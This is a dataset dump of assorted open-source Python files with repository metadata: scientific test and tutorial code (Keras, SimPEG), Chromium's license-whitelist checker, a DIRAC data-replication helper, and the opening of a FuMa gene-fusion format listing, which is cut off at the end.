Column     Type          Range / values
---------  ------------  ---------------------
text       string        lengths 12 to 1.05M
repo_name  string        lengths 5 to 86
path       string        lengths 4 to 191
language   string class  1 value
license    string class  15 values
size       int32         12 to 1.05M
keyword    list          lengths 1 to 23
text_hash  string        length 64 (fixed)
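For orientation, here is a minimal sketch (not part of the dump itself) of how rows with this schema might be loaded and sanity-checked. Two assumptions are made: the rows are stored as JSON Lines in a hypothetical file named code_dataset.jsonl, and text_hash is the SHA-256 hex digest of text, inferred only from its fixed 64-character length.

import hashlib
import json

# Hypothetical filename; the dump's actual storage format is not specified.
with open('code_dataset.jsonl', 'r', encoding='utf-8') as f:
    for line in f:
        row = json.loads(line)
        # Every row carries one source file plus provenance metadata.
        assert row['language'] == 'Python'   # schema: 1 string class
        assert len(row['text_hash']) == 64   # schema: fixed length 64
        # Assumption: text_hash is SHA-256 of the raw file text.
        digest = hashlib.sha256(row['text'].encode('utf-8')).hexdigest()
        if digest != row['text_hash']:
            print('hash mismatch (or a different algorithm):', row['path'])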
'''
sbclearn (c) University of Manchester 2017

sbclearn is licensed under the MIT License.

To view a copy of this license, visit <http://opensource.org/licenses/MIT/>.

@author: neilswainston
'''
# pylint: disable=invalid-name
# pylint: disable=no-member
# pylint: disable=wrong-import-order
import unittest

from keras.layers import Dense
from keras.models import Sequential
from keras.utils import to_categorical
from keras.wrappers.scikit_learn import KerasRegressor
from sklearn import metrics, model_selection
from sklearn.datasets.samples_generator import make_blobs
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score

from gg_learn.keras import Classifier
import numpy as np
import pandas as pd

# from sklearn.metrics import confusion_matrix


class TestClassifier(unittest.TestCase):
    '''Tests the Classifier class.'''

    def test_classify(self):
        '''Tests the classify method.'''
        centers = 5
        x_data, y_data = make_blobs(n_samples=1000, centers=centers,
                                    n_features=3, cluster_std=1.0,
                                    random_state=0)
        y_data = to_categorical(y_data, num_classes=centers)

        x_train, x_test, y_train, y_test = \
            model_selection.train_test_split(x_data, y_data, test_size=0.2)

        classifier = Classifier(x_train, y_train)
        classifier.train()

        y_pred = classifier.predict(x_test)
        y_pred = np.array([[round(val) for val in pred] for pred in y_pred])

        # print confusion_matrix(y_test, y_pred)
        self.assertTrue(metrics.accuracy_score(y_test, y_pred) > 0.9)


class TestRegressor(unittest.TestCase):
    '''Tests the Regressor class.'''

    def test_regression(self):
        '''Tests the regression method.'''
        df = pd.read_csv('housing.csv', delim_whitespace=True, header=None)
        dataset = df.values
        x_data = dataset[:, 0:-1]
        y_data = dataset[:, -1]

        # create model
        # evaluate model with standardized dataset
        regressor = KerasRegressor(
            build_fn=get_model, nb_epoch=100, batch_size=5)

        kfold = KFold(n_splits=5)
        results = cross_val_score(regressor, x_data, y_data, cv=kfold)
        print('Results: %.2f (%.2f) MSE' % (results.mean(), results.std()))
        self.assertTrue(results.mean() > 40)


def get_model():
    '''Gets model.'''
    model = Sequential()
    model.add(Dense(64, input_dim=13, kernel_initializer='normal',
                    activation='relu'))
    model.add(Dense(1, kernel_initializer='normal'))

    # Compile model
    model.compile(loss='mean_squared_error', optimizer='adam')
    return model
synbiochem/synbiochem-learn
gg_learn/keras/test/test_utils.py
Python
mit
2,824
[ "VisIt" ]
9cbb38deabcd79ace4e3fdede01a6647ee93237ce11577523a02a5cb128b9425
from disco.test import TestCase, TestJob


class RawJob(TestJob):
    @staticmethod
    def map(e, params):
        yield 'raw://%s' % e, ''


class RawTestCase(TestCase):
    def runTest(self):
        input = ['raw://eeny', 'raw://meeny', 'raw://miny', 'raw://moe']
        self.job = RawJob().run(input=input)
        self.assertEqual(sorted(self.results(self.job)),
                         sorted((i, '') for i in input))
scrapinghub/disco
tests/test_raw.py
Python
bsd-3-clause
426
[ "MOE" ]
f02662e8fecee4f5ff16d3154701bc6cf39f14d304541f7f755412216d1a9f14
# encoding: utf-8
#
# Copyright (C) 2013-2015 RoboIME
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
"""
General options during execution
"""

#Position Log filename. Use None to disable.
position_log_filename = "math/pos_log.txt"
#position_log_filename = None

#Command and Update Log filename. Use None to disable.
cmdupd_filename = "math/commands.txt"
#cmdupd_filename = None

#Gaussian noise addition variances
noise_var_x = 3.E-5
noise_var_y = 3.E-5
noise_var_angle = 1.

# Process error estimate. The lower (higher negative exponent), more the filter
# becomes like a Low-Pass Filter (higher confidence in the model prediction).
Q = 1e-5

# Measurement error variances (for the R matrix).
# The higher (lower negative exponent), more the filter becomes like a
# Low-Pass Filter (higher possible measurement error).
R_var_x = 3.E-5
R_var_y = 3.E-5
R_var_angle = 1e-5
roboime/pyroboime
roboime/options.py
Python
agpl-3.0
1,335
[ "Gaussian" ]
962174babc3b9ebb750f89abdd7a099e4ee9e945a98ba0405d7cb60f53618ea1
# To run this, install Python and make sure it is in your path
# environment variable, and then run it from the command line
# as
#
#   python vs3tovtk.py input.vs3 output.vtk
#
# This script should work with Python 2.7+ and 3+
#
import sys
import os
import vs3

fperr = sys.stderr

if not len(sys.argv) in [2,3]:  # Require 2 or 3 arguments
    sys.exit('usage: python vs3tovtk.py <VS3 file> [VTK file]')

# Use exception handling to handle bad file name input
try:
    infile = open(sys.argv[1],'r')
except IOError:
    sys.exit('Failed to open input file "%s"' % sys.argv[1])

if len(sys.argv) == 3:
    outname = sys.argv[2]
else:
    basename = os.path.splitext(sys.argv[1])[0]
    outname = basename + '.vtk'

try:
    outfile = open(outname,'w')
except IOError:
    sys.exit('Failed to open output file "%s"' % outname)

# Read in the VS3 file
vs3data = vs3.Data.load(infile,stringData=True)
infile.close()

# Write the VTK file
vs3data.writeVTK(outfile)
outfile.close()

# Write out the stats
fperr.write('Summary of input file "%s":\n' % sys.argv[1])
fperr.write('  %d vertices\n' % vs3data.nvertices())
fperr.write('  %d surfaces\n' % vs3data.nsurfaces())
#print('  %d regular' % stats['S'])
#print('  %d mask' % stats['M'])
#print('  %d null' % stats['N'])
#print('  %d obstructing' % stats['O'])
jasondegraw/View3D-Resources
scripts/vs3tovtk.py
Python
gpl-3.0
1,318
[ "VTK" ]
02e156d93d7c20abaad00ce9d08c64d82a0cedca324e241e98b6a9179f85d72a
""" Linear Least-Squares Inversion ============================== Here we demonstrate the basics of inverting data with SimPEG by considering a linear inverse problem. We formulate the inverse problem as a least-squares optimization problem. For this tutorial, we focus on the following: - Defining the forward problem - Defining the inverse problem (data misfit, regularization, optimization) - Specifying directives for the inversion - Recovering a set of model parameters which explains the observations """ ######################################################################### # Import Modules # -------------- # import numpy as np import matplotlib.pyplot as plt from discretize import TensorMesh from SimPEG import ( simulation, maps, data_misfit, directives, optimization, regularization, inverse_problem, inversion, ) # sphinx_gallery_thumbnail_number = 3 ############################################# # Defining the Model and Mapping # ------------------------------ # # Here we generate a synthetic model and a mappig which goes from the model # space to the row space of our linear operator. # nParam = 100 # Number of model paramters # A 1D mesh is used to define the row-space of the linear operator. mesh = TensorMesh([nParam]) # Creating the true model true_model = np.zeros(mesh.nC) true_model[mesh.vectorCCx > 0.3] = 1.0 true_model[mesh.vectorCCx > 0.45] = -0.5 true_model[mesh.vectorCCx > 0.6] = 0 # Mapping from the model space to the row space of the linear operator model_map = maps.IdentityMap(mesh) # Plotting the true model fig = plt.figure(figsize=(8, 5)) ax = fig.add_subplot(111) ax.plot(mesh.vectorCCx, true_model, "b-") ax.set_ylim([-2, 2]) ############################################# # Defining the Linear Operator # ---------------------------- # # Here we define the linear operator with dimensions (nData, nParam). In practive, # you may have a problem-specific linear operator which you would like to construct # or load here. # # Number of data observations (rows) nData = 20 # Create the linear operator for the tutorial. The columns of the linear operator # represents a set of decaying and oscillating functions. jk = np.linspace(1.0, 60.0, nData) p = -0.25 q = 0.25 def g(k): return np.exp(p * jk[k] * mesh.vectorCCx) * np.cos( np.pi * q * jk[k] * mesh.vectorCCx ) G = np.empty((nData, nParam)) for i in range(nData): G[i, :] = g(i) # Plot the columns of G fig = plt.figure(figsize=(8, 5)) ax = fig.add_subplot(111) for i in range(G.shape[0]): ax.plot(G[i, :]) ax.set_title("Columns of matrix G") ############################################# # Defining the Simulation # ----------------------- # # The simulation defines the relationship between the model parameters and # predicted data. # sim = simulation.LinearSimulation(mesh, G=G, model_map=model_map) ############################################# # Predict Synthetic Data # ---------------------- # # Here, we use the true model to create synthetic data which we will subsequently # invert. 
# # Standard deviation of Gaussian noise being added std = 0.01 np.random.seed(1) # Create a SimPEG data object data_obj = sim.make_synthetic_data(true_model, relative_error=std, add_noise=True) ####################################################################### # Define the Inverse Problem # -------------------------- # # The inverse problem is defined by 3 things: # # 1) Data Misfit: a measure of how well our recovered model explains the field data # 2) Regularization: constraints placed on the recovered model and a priori information # 3) Optimization: the numerical approach used to solve the inverse problem # # Define the data misfit. Here the data misfit is the L2 norm of the weighted # residual between the observed data and the data predicted for a given model. # Within the data misfit, the residual between predicted and observed data are # normalized by the data's standard deviation. dmis = data_misfit.L2DataMisfit(simulation=sim, data=data_obj) # Define the regularization (model objective function). reg = regularization.Tikhonov(mesh, alpha_s=1.0, alpha_x=1.0) # Define how the optimization problem is solved. opt = optimization.InexactGaussNewton(maxIter=50) # Here we define the inverse problem that is to be solved inv_prob = inverse_problem.BaseInvProblem(dmis, reg, opt) ####################################################################### # Define Inversion Directives # --------------------------- # # Here we define any directiveas that are carried out during the inversion. This # includes the cooling schedule for the trade-off parameter (beta), stopping # criteria for the inversion and saving inversion results at each iteration. # # Defining a starting value for the trade-off parameter (beta) between the data # misfit and the regularization. starting_beta = directives.BetaEstimate_ByEig(beta0_ratio=1e-4) # Setting a stopping criteria for the inversion. target_misfit = directives.TargetMisfit() # The directives are defined as a list. directives_list = [starting_beta, target_misfit] ##################################################################### # Setting a Starting Model and Running the Inversion # -------------------------------------------------- # # To define the inversion object, we need to define the inversion problem and # the set of directives. We can then run the inversion. # # Here we combine the inverse problem and the set of directives inv = inversion.BaseInversion(inv_prob, directives_list) # Starting model starting_model = np.zeros(nParam) # Run inversion recovered_model = inv.run(starting_model) ##################################################################### # Plotting Results # ---------------- # # Observed versus predicted data fig, ax = plt.subplots(1, 2, figsize=(12 * 1.2, 4 * 1.2)) ax[0].plot(data_obj.dobs, "b-") ax[0].plot(inv_prob.dpred, "r-") ax[0].legend(("Observed Data", "Predicted Data")) # True versus recovered model ax[1].plot(mesh.vectorCCx, true_model, "b-") ax[1].plot(mesh.vectorCCx, recovered_model, "r-") ax[1].legend(("True Model", "Recovered Model")) ax[1].set_ylim([-2, 2])
simpeg/simpeg
tutorials/02-linear_inversion/plot_inv_1_inversion_lsq.py
Python
mit
6,216
[ "Gaussian" ]
98ac15079bb8fc70123a8d7d4f2df6fe9b0590232c4bb63fc817b5078c810075
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""Makes sure that all files contain proper licensing information."""


import optparse
import os.path
import subprocess
import sys


def PrintUsage():
  print """Usage: python checklicenses.py [--root <root>] [tocheck]

  --root  Specifies the repository root. This defaults to "../.." relative
          to the script file. This will be correct given the normal location
          of the script in "<root>/tools/checklicenses".

  --ignore-suppressions  Ignores path-specific license whitelist. Useful when
                         trying to remove a suppression/whitelist entry.

  tocheck  Specifies the directory, relative to root, to check. This defaults
           to "." so it checks everything.

Examples:
  python checklicenses.py
  python checklicenses.py --root ~/chromium/src third_party"""


WHITELISTED_LICENSES = [
    'Apache (v2.0)',
    'Apache (v2.0) BSD (2 clause)',
    'Apache (v2.0) GPL (v2)',
    'Apple MIT',  # https://fedoraproject.org/wiki/Licensing/Apple_MIT_License
    'APSL (v2)',
    'APSL (v2) BSD (4 clause)',
    'BSD',
    'BSD (2 clause)',
    'BSD (2 clause) MIT/X11 (BSD like)',
    'BSD (3 clause)',
    'BSD (3 clause) GPL (v2)',
    'BSD (3 clause) ISC',
    'BSD (3 clause) LGPL (v2 or later)',
    'BSD (3 clause) LGPL (v2.1 or later)',
    'BSD (3 clause) MIT/X11 (BSD like)',
    'BSD (4 clause)',
    'BSD-like',

    # TODO(phajdan.jr): Make licensecheck not print BSD-like twice.
    'BSD-like MIT/X11 (BSD like)',

    'BSL (v1.0)',
    'GPL (v2 or later) with Bison parser exception',
    'GPL (v2 or later) with libtool exception',
    'GPL (v3 or later) with Bison parser exception',
    'GPL with Bison parser exception',
    'ISC',
    'LGPL',
    'LGPL (v2)',
    'LGPL (v2 or later)',
    'LGPL (v2.1)',
    'LGPL (v3 or later)',

    # TODO(phajdan.jr): Make licensecheck convert that comma to a dot.
    'LGPL (v2,1 or later)',

    'LGPL (v2.1 or later)',
    'MPL (v1.0) LGPL (v2 or later)',
    'MPL (v1.1)',
    'MPL (v1.1) BSD-like',
    'MPL (v1.1) BSD-like GPL (unversioned/unknown version)',
    'MPL (v1.1,) BSD (3 clause) GPL (unversioned/unknown version) '
        'LGPL (v2.1 or later)',
    'MPL (v1.1) GPL (unversioned/unknown version)',
    'MPL (v2.0)',

    # TODO(phajdan.jr): Make licensecheck not print the comma after 1.1.
    'MPL (v1.1,) GPL (unversioned/unknown version) LGPL (v2 or later)',
    'MPL (v1.1,) GPL (unversioned/unknown version) LGPL (v2.1 or later)',

    'MIT/X11 (BSD like)',
    'Ms-PL',
    'Public domain',
    'Public domain BSD',
    'Public domain BSD (3 clause)',
    'Public domain BSD-like',
    'Public domain LGPL (v2.1 or later)',
    'libpng',
    'zlib/libpng',
    'SGI Free Software License B',
    'University of Illinois/NCSA Open Source License (BSD like)',
]


PATH_SPECIFIC_WHITELISTED_LICENSES = {
    'base/hash.cc': [  # http://crbug.com/98100
        'UNKNOWN',
    ],
    'base/third_party/icu': [  # http://crbug.com/98087
        'UNKNOWN',
    ],

    # http://code.google.com/p/google-breakpad/issues/detail?id=450
    'breakpad/src': [
        'UNKNOWN',
    ],

    'chrome/common/extensions/docs/examples': [  # http://crbug.com/98092
        'UNKNOWN',
    ],
    'chrome/test/data/gpu/vt': [
        'UNKNOWN',
    ],
    'chrome/test/data/layout_tests/LayoutTests': [
        'UNKNOWN',
    ],
    'courgette/third_party/bsdiff_create.cc': [  # http://crbug.com/98095
        'UNKNOWN',
    ],
    'data/mozilla_js_tests': [
        'UNKNOWN',
    ],
    'data/page_cycler': [
        'UNKNOWN',
        'GPL (v2 or later)',
    ],
    'data/tab_switching': [
        'UNKNOWN',
    ],
    'googleurl': [  # http://code.google.com/p/google-url/issues/detail?id=15
        'UNKNOWN',
    ],
    'native_client': [  # http://crbug.com/98099
        'UNKNOWN',
    ],
    'native_client/toolchain': [
        'BSD GPL (v2 or later)',
        'BSD (2 clause) GPL (v2 or later)',
        'BSD (3 clause) GPL (v2 or later)',
        'BSL (v1.0) GPL',
        'BSL (v1.0) GPL (v3.1)',
        'GPL',
        'GPL (unversioned/unknown version)',
        'GPL (v2)',
        'GPL (v2 or later)',
        'GPL (v3.1)',
        'GPL (v3 or later)',
    ],
    'net/tools/spdyshark': [
        'GPL (v2 or later)',
        'UNKNOWN',
    ],
    'third_party/WebKit': [
        'UNKNOWN',
    ],
    'third_party/WebKit/Websites/webkit.org/blog/wp-content/plugins/'
        'akismet/akismet.php': [
        'GPL (v2 or later)'
    ],
    'third_party/WebKit/Source/JavaScriptCore/tests/mozilla': [
        'GPL',
        'GPL (v2 or later)',
        'GPL (unversioned/unknown version)',
    ],
    'third_party/active_doc': [  # http://crbug.com/98113
        'UNKNOWN',
    ],

    # http://code.google.com/p/angleproject/issues/detail?id=217
    'third_party/angle': [
        'UNKNOWN',
    ],

    'third_party/bsdiff/mbsdiff.cc': [
        'UNKNOWN',
    ],
    'third_party/bzip2': [
        'UNKNOWN',
    ],

    # http://crbug.com/222828
    # http://bugs.python.org/issue17514
    'third_party/chromite/third_party/argparse.py': [
        'UNKNOWN',
    ],

    # Not used. http://crbug.com/156020
    # Using third_party/cros_dbus_cplusplus/cros_dbus_cplusplus.gyp instead.
    'third_party/cros_dbus_cplusplus/source/autogen.sh': [
        'UNKNOWN',
    ],
    # Included in the source tree but not built. http://crbug.com/156020
    'third_party/cros_dbus_cplusplus/source/examples': [
        'UNKNOWN',
    ],
    'third_party/devscripts': [
        'GPL (v2 or later)',
    ],
    'third_party/expat/files/lib': [  # http://crbug.com/98121
        'UNKNOWN',
    ],
    'third_party/ffmpeg': [
        'GPL',
        'GPL (v2)',
        'GPL (v2 or later)',
        'UNKNOWN',  # http://crbug.com/98123
    ],
    'third_party/findbugs/doc': [  # http://crbug.com/157206
        'UNKNOWN',
    ],
    'third_party/freetype2': [  # http://crbug.com/177319
        'UNKNOWN',
    ],
    'third_party/gles2_book': [  # http://crbug.com/98130
        'UNKNOWN',
    ],
    'third_party/gles2_conform/GTF_ES': [  # http://crbug.com/98131
        'UNKNOWN',
    ],
    'third_party/harfbuzz': [  # http://crbug.com/98133
        'UNKNOWN',
    ],
    'third_party/hunspell': [  # http://crbug.com/98134
        'UNKNOWN',
    ],
    'third_party/hyphen/hyphen.tex': [  # http://crbug.com/157375
        'UNKNOWN',
    ],
    'third_party/iccjpeg': [  # http://crbug.com/98137
        'UNKNOWN',
    ],
    'third_party/icu': [  # http://crbug.com/98301
        'UNKNOWN',
    ],
    'third_party/jemalloc': [  # http://crbug.com/98302
        'UNKNOWN',
    ],
    'third_party/lcov': [  # http://crbug.com/98304
        'UNKNOWN',
    ],
    'third_party/lcov/contrib/galaxy/genflat.pl': [
        'GPL (v2 or later)',
    ],
    'third_party/lcov-1.9/contrib/galaxy/genflat.pl': [
        'GPL (v2 or later)',
    ],
    'third_party/libevent': [  # http://crbug.com/98309
        'UNKNOWN',
    ],
    'third_party/libjingle/source/talk': [  # http://crbug.com/98310
        'UNKNOWN',
    ],
    'third_party/libjingle/source_internal/talk': [  # http://crbug.com/98310
        'UNKNOWN',
    ],
    'third_party/libjpeg': [  # http://crbug.com/98313
        'UNKNOWN',
    ],
    'third_party/libjpeg_turbo': [  # http://crbug.com/98314
        'UNKNOWN',
    ],
    'third_party/libpng': [  # http://crbug.com/98318
        'UNKNOWN',
    ],

    # The following files lack license headers, but are trivial.
    'third_party/libusb/src/libusb/os/poll_posix.h': [
        'UNKNOWN',
    ],
    'third_party/libusb/src/libusb/version.h': [
        'UNKNOWN',
    ],
    'third_party/libusb/src/autogen.sh': [
        'UNKNOWN',
    ],
    'third_party/libusb/src/config.h': [
        'UNKNOWN',
    ],
    'third_party/libusb/src/msvc/config.h': [
        'UNKNOWN',
    ],

    'third_party/libvpx/source': [  # http://crbug.com/98319
        'UNKNOWN',
    ],
    'third_party/libvpx/source/libvpx/examples/includes': [
        'GPL (v2 or later)',
    ],
    'third_party/libwebp': [  # http://crbug.com/98448
        'UNKNOWN',
    ],
    'third_party/libxml': [
        'UNKNOWN',
    ],
    'third_party/libxslt': [
        'UNKNOWN',
    ],
    'third_party/lzma_sdk': [
        'UNKNOWN',
    ],
    'third_party/mesa/MesaLib': [
        'GPL (v2)',
        'GPL (v3 or later)',
        'MIT/X11 (BSD like) GPL (v3 or later) with Bison parser exception',
        'UNKNOWN',  # http://crbug.com/98450
    ],
    'third_party/modp_b64': [
        'UNKNOWN',
    ],
    'third_party/npapi/npspy/extern/java': [
        'GPL (unversioned/unknown version)',
    ],
    'third_party/openmax_dl/dl' : [
        'Khronos Group',
    ],
    'third_party/openssl': [  # http://crbug.com/98451
        'UNKNOWN',
    ],
    'third_party/ots/tools/ttf-checksum.py': [
        # http://code.google.com/p/ots/issues/detail?id=2
        'UNKNOWN',
    ],
    'third_party/molokocacao': [  # http://crbug.com/98453
        'UNKNOWN',
    ],
    'third_party/npapi/npspy': [
        'UNKNOWN',
    ],
    'third_party/ocmock/OCMock': [  # http://crbug.com/98454
        'UNKNOWN',
    ],
    'third_party/ply/__init__.py': [
        'UNKNOWN',
    ],
    'third_party/protobuf': [  # http://crbug.com/98455
        'UNKNOWN',
    ],

    # http://crbug.com/222831
    # https://bitbucket.org/eliben/pyelftools/issue/12
    'third_party/pyelftools': [
        'UNKNOWN',
    ],

    'third_party/pylib': [
        'UNKNOWN',
    ],
    'third_party/scons-2.0.1/engine/SCons': [  # http://crbug.com/98462
        'UNKNOWN',
    ],
    'third_party/simplejson': [
        'UNKNOWN',
    ],
    'third_party/skia': [  # http://crbug.com/98463
        'UNKNOWN',
    ],
    'third_party/snappy/src': [  # http://crbug.com/98464
        'UNKNOWN',
    ],
    'third_party/smhasher/src': [  # http://crbug.com/98465
        'UNKNOWN',
    ],
    'third_party/speech-dispatcher/libspeechd.h': [
        'GPL (v2 or later)',
    ],
    'third_party/sqlite': [
        'UNKNOWN',
    ],
    'third_party/swig/Lib/linkruntime.c': [  # http://crbug.com/98585
        'UNKNOWN',
    ],
    'third_party/talloc': [
        'GPL (v3 or later)',
        'UNKNOWN',  # http://crbug.com/98588
    ],
    'third_party/tcmalloc': [
        'UNKNOWN',  # http://crbug.com/98589
    ],
    'third_party/tlslite': [
        'UNKNOWN',
    ],
    'third_party/webdriver': [  # http://crbug.com/98590
        'UNKNOWN',
    ],
    'third_party/webrtc': [  # http://crbug.com/98592
        'UNKNOWN',
    ],
    'third_party/xdg-utils': [  # http://crbug.com/98593
        'UNKNOWN',
    ],
    'third_party/yasm/source': [  # http://crbug.com/98594
        'UNKNOWN',
    ],
    'third_party/zlib/contrib/minizip': [
        'UNKNOWN',
    ],
    'third_party/zlib/trees.h': [
        'UNKNOWN',
    ],
    'tools/dromaeo_benchmark_runner/dromaeo_benchmark_runner.py': [
        'UNKNOWN',
    ],
    'tools/emacs': [  # http://crbug.com/98595
        'UNKNOWN',
    ],
    'tools/grit/grit/node/custom/__init__.py': [
        'UNKNOWN',
    ],
    'tools/gyp/test': [
        'UNKNOWN',
    ],
    'tools/histograms': [
        'UNKNOWN',
    ],
    'tools/memory_watcher': [
        'UNKNOWN',
    ],
    'tools/playback_benchmark': [
        'UNKNOWN',
    ],
    'tools/python/google/__init__.py': [
        'UNKNOWN',
    ],
    'tools/site_compare': [
        'UNKNOWN',
    ],
    'tools/stats_viewer/Properties/AssemblyInfo.cs': [
        'UNKNOWN',
    ],
    'tools/symsrc/pefile.py': [
        'UNKNOWN',
    ],
    'v8/test/cctest': [  # http://crbug.com/98597
        'UNKNOWN',
    ],
    'webkit/data/ico_decoder': [
        'UNKNOWN',
    ],
}


def check_licenses(options, args):
  # Figure out which directory we have to check.
  if len(args) == 0:
    # No directory to check specified, use the repository root.
    start_dir = options.base_directory
  elif len(args) == 1:
    # Directory specified. Start here. It's supposed to be relative to the
    # base directory.
    start_dir = os.path.abspath(os.path.join(options.base_directory, args[0]))
  else:
    # More than one argument, we don't handle this.
    PrintUsage()
    return 1

  print "Using base directory:", options.base_directory
  print "Checking:", start_dir
  print

  licensecheck_path = os.path.abspath(os.path.join(options.base_directory,
                                                   'third_party',
                                                   'devscripts',
                                                   'licensecheck.pl'))

  licensecheck = subprocess.Popen([licensecheck_path,
                                   '-l', '100',
                                   '-r', start_dir],
                                  stdout=subprocess.PIPE,
                                  stderr=subprocess.PIPE)
  stdout, stderr = licensecheck.communicate()
  if options.verbose:
    print '----------- licensecheck stdout -----------'
    print stdout
    print '--------- end licensecheck stdout ---------'
  if licensecheck.returncode != 0 or stderr:
    print '----------- licensecheck stderr -----------'
    print stderr
    print '--------- end licensecheck stderr ---------'
    print "\nFAILED\n"
    return 1

  success = True
  for line in stdout.splitlines():
    filename, license = line.split(':', 1)
    filename = os.path.relpath(filename.strip(), options.base_directory)

    # All files in the build output directory are generated one way or another.
    # There's no need to check them.
    if filename.startswith('out/') or filename.startswith('sconsbuild/'):
      continue

    # For now we're just interested in the license.
    license = license.replace('*No copyright*', '').strip()

    # Skip generated files.
    if 'GENERATED FILE' in license:
      continue

    if license in WHITELISTED_LICENSES:
      continue

    if not options.ignore_suppressions:
      found_path_specific = False
      for prefix in PATH_SPECIFIC_WHITELISTED_LICENSES:
        if (filename.startswith(prefix) and
            license in PATH_SPECIFIC_WHITELISTED_LICENSES[prefix]):
          found_path_specific = True
          break
      if found_path_specific:
        continue

    print "'%s' has non-whitelisted license '%s'" % (filename, license)
    success = False

  if success:
    print "\nSUCCESS\n"
    return 0
  else:
    print "\nFAILED\n"
    print "Please read",
    print "http://www.chromium.org/developers/adding-3rd-party-libraries"
    print "for more info how to handle the failure."
    print
    print "Please respect OWNERS of checklicenses.py. Changes violating"
    print "this requirement may be reverted."
    return 1


def main():
  default_root = os.path.abspath(
      os.path.join(os.path.dirname(__file__), '..', '..'))
  option_parser = optparse.OptionParser()
  option_parser.add_option('--root', default=default_root,
                           dest='base_directory',
                           help='Specifies the repository root. This defaults '
                           'to "../.." relative to the script file, which '
                           'will normally be the repository root.')
  option_parser.add_option('-v', '--verbose', action='store_true',
                           default=False, help='Print debug logging')
  option_parser.add_option('--ignore-suppressions',
                           action='store_true',
                           default=False,
                           help='Ignore path-specific license whitelist.')
  options, args = option_parser.parse_args()
  return check_licenses(options, args)


if '__main__' == __name__:
  sys.exit(main())
loopCM/chromium
tools/checklicenses/checklicenses.py
Python
bsd-3-clause
15,806
[ "Galaxy" ]
d260e72713c00c693d688b63a5c3c76400b5ba15edab89fc3b907c7c7f4e8be2
""" Utilities to create replication transformations """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import six from DIRAC.TransformationSystem.Client.Transformation import Transformation from DIRAC import gLogger, S_OK, S_ERROR def createDataTransformation(flavour, targetSE, sourceSE, metaKey, metaValue, extraData=None, extraname='', groupSize=1, plugin='Broadcast', tGroup=None, tBody=None, enable=False, ): """Creates the replication transformation based on the given parameters. :param str flavour: Flavour of replication to create: Replication or Moving :param targetSE: Destination for files :type targetSE: python:list or str :param sourceSE: Origin of files :type sourceSE: python:list or str :param int metaKey: Meta key to identify input files :param int metaValue: Meta value to identify input files :param dict metaData: Additional meta data to use to identify input files :param str extraname: addition to the transformation name, only needed if the same transformation was already created :param int groupSize: number of files per transformation taks :param str plugin: plugin to use :param str tGroup: transformation group to set :param tBody: transformation body to set :param bool enable: if true submit the transformation, otherwise dry run :returns: S_OK (with the transformation object, if successfully added), S_ERROR """ metadata = {metaKey: metaValue} if isinstance(extraData, dict): metadata.update(extraData) gLogger.debug("Using %r for metadata search" % metadata) if isinstance(targetSE, six.string_types): targetSE = [targetSE] if isinstance(sourceSE, (list, tuple)): sourceSE = '%s' % (",".join(sourceSE)) gLogger.debug('Using plugin: %r' % plugin) if flavour not in ('Replication', 'Moving'): return S_ERROR('Unsupported flavour %s' % flavour) transVerb = {'Replication': 'Replicate', 'Moving': 'Move'}[flavour] transGroup = {'Replication': 'Replication', 'Moving': 'Moving'}[flavour] if not tGroup else tGroup trans = Transformation() transName = '%s_%s_%s' % (transVerb, str(metaValue), ",".join(targetSE)) if extraname: transName += "_%s" % extraname trans.setTransformationName(transName) description = '%s files for %s %s to %s' % (transVerb, metaKey, str(metaValue), ",".join(targetSE)) trans.setDescription(description[:255]) trans.setLongDescription(description) trans.setType('Replication') trans.setTransformationGroup(transGroup) trans.setGroupSize(groupSize) trans.setPlugin(plugin) transBody = {'Moving': [("ReplicateAndRegister", {"SourceSE": sourceSE, "TargetSE": targetSE}), ("RemoveReplica", {"TargetSE": sourceSE})], 'Replication': '', # empty body }[flavour] if tBody is None else tBody trans.setBody(transBody) trans.setInputMetaQuery(metadata) if sourceSE: res = trans.setSourceSE(sourceSE) if not res['OK']: return S_ERROR("SourceSE not valid: %s" % res['Message']) res = trans.setTargetSE(targetSE) if not res['OK']: return S_ERROR("TargetSE not valid: %s" % res['Message']) if not enable: gLogger.always("Dry run, not creating transformation") return S_OK() res = trans.addTransformation() if not res['OK']: return res gLogger.verbose(res) trans.setStatus('Active') trans.setAgentType('Automatic') gLogger.always("Successfully created replication transformation") return S_OK(trans)
yujikato/DIRAC
src/DIRAC/TransformationSystem/Utilities/ReplicationTransformation.py
Python
gpl-3.0
3,762
[ "DIRAC" ]
b31e8b60bb6ba6b65486e67934a788330e20b617b71a37313f4bb7d613ebe69c
#!/usr/bin/env python

"""[License: GNU General Public License v3 (GPLv3)]

 This file is part of FuMa.

 FuMa is free software: you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
 the Free Software Foundation, either version 3 of the License, or
 (at your option) any later version.

 FuMa is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 GNU General Public License for more details.

 You should have received a copy of the GNU General Public License
 along with this program. If not, see <http://www.gnu.org/licenses/>.

 Documentation as defined by:
 <http://epydoc.sourceforge.net/manual-fields.html#fields-synonyms>
"""

import fuma
import sys,argparse,textwrap,datetime


def show_formats():
    return """FuMa supports the following file formats:

Tools              | File                  | Format string
----------------------------------------------------------
Chimera            | prettyPrint() output  | chimera
ChimeraScan        | chimeras.bedpe        | chimerascan
Complete Genomics  | highConfidenceJu*.tsv | complete-genomics
Complete Genomics  | allJunctionsBeta*.tsv | complete-genomics
DeFuse             | results.txt           | defuse
DeFuse             | results.classify.txt  | defuse
DeFuse             | results.filtered.txt  | defuse
EricScript         | .results.total.txt    | ericscript *************
Fusion Catcher     | final-list_cand*.txt  | fusion-catcher_final
FusionMap          |                       | fusionmap
JAFFA              | jaffa_results.csv     | jaffa
Trinity + GMAP     |                       | trinity-gmap
OncoFuse           |                       | oncofuse
RNA STAR           | Chimeric.out.junction | rna-star_chimeric
SOAPFuse           | final.*.for.genes.txt | soapfuse-final-gene
